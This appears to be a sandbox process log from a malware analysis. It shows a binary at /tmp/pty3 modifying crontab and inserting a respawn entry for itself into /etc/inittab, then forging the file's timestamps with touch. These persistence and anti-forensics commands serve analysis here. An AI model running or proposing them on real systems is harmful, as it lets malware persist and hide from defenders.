                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v /var/run/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab2
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "rm -rf /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/rm
                                                                                                                                          Arguments:rm -rf /etc/inittab2
                                                                                                                                          File size:72056 bytes
                                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/touch
                                                                                                                                          Arguments:touch -acmr /bin/ls /etc/inittab
                                                                                                                                          File size:100728 bytes
                                                                                                                                          MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "/bin/uname -n"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/uname
                                                                                                                                          Arguments:/bin/uname -n
                                                                                                                                          File size:39288 bytes
                                                                                                                                          MD5 hash:4ac7c634c5bec95753c480e9d421dcc2